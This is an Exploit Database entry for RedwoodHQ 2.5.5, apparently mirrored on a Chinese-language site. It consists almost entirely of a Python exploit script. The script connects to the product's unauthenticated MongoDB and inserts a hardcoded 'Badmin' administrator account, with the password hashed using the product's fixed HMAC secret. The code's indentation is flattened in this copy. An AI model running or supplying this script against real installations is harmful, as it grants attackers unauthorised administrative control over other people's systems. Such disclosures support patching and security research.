RedwoodHQ 2.5.5 – Authentication Bypass

• Exploit Database
• 104 阅读

• 作者： EthicalHCOP
  日期： 2019-06-17
• 类别：

  • webapps
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/46992/

• # -*- encoding: utf-8 -*-
  #!/usr/bin/python3
  
  # Exploit Title: RedxploitHQ (Create Admin User by missing authentication on db)
  # Date: 	 14-june-2019
  # Exploit Author:EthicalHCOP
  # Version: 	 2.0 / 2.5.5
  # Vendor Homepage: https://redwoodhq.com/
  # Software Link: https://redwoodhq.com/redwood-download/
  # Tested on: 	 Ubuntu and Windows.
  # Twitter:	 @EthicalHcop
  # Usage: python3 RedxploitHQ.py -H mongo_host -P mongo_port
  # Description: 	 Use RedxploitHQ to create a new Admin user into redwoodhq and get all the functions on the framework
  # 
  # RedwoodHQ doesn't require that MongoDB is installed on the machine because this tool haveher own Mongo Launcher. 
  # The problem is that this vendor database doesn't require any authentication to read her data. 
  # So, I use the same syntax that use the Framework to create my admin user on the database and access into the tool
  # 
  # POC: https://youtu.be/MK9AvoJDtxY
  
  import hashlib
  import hmac
  import optparse
  from pymongo import MongoClient
  
  def CreateHMAC(Pass):
  message = bytes(Pass,encoding='utf8')
  secret = bytes('redwood',encoding='utf8')
  hash = hmac.new(secret, message, hashlib.md5)
  return (hash.hexdigest())
  
  def DbConnect(ip,port):
  uri = "mongodb://" + ip + ":" + port + "/"
  con = MongoClient(uri)
  return con
  
  def DbDisconnect(con):
  con.close()
  
  def CreateBadminUser(ip, port, user, passw):
  con = DbConnect(ip, port)
  db = con.automationframework
  usr = db.users
  passw = CreateHMAC(passw)
  data = {
  "name": user,
  "password": passw,
  "tag": [],
  "role": "Admin",
  "username": user,
  "status": ""
  }
  usr.insert_one(data)
  DbDisconnect(con)
  
  def start():
  parser = optparse.OptionParser('usage %prog ' + \
   '-H host -P port')
  parser.add_option('-P', '--Port', dest='port', type='string', \
  help='MongoDB Port')
  parser.add_option('-H', '--Host', dest='host', type='string', \
  help='MongoDB Host')
  (options, args) = parser.parse_args()
  ip = options.host
  port = options.port
  if (str(ip) == "None"):
  print("Insert Host")
  exit(0)
  if (str(port) == "None"):
  port = "27017"
  try:
  CreateBadminUser(str(ip), str(port), 'Badmin', 'Badmin')
  print("[+] New user 'Badmin'/'Badmin' created.")
  except Exception as e:
  print("[-] Can't create the 'Badmin'/'Badmin' user. Error: "+str(e))
  
  if __name__ == '__main__':
  start()
  

  PowerShell

  Copy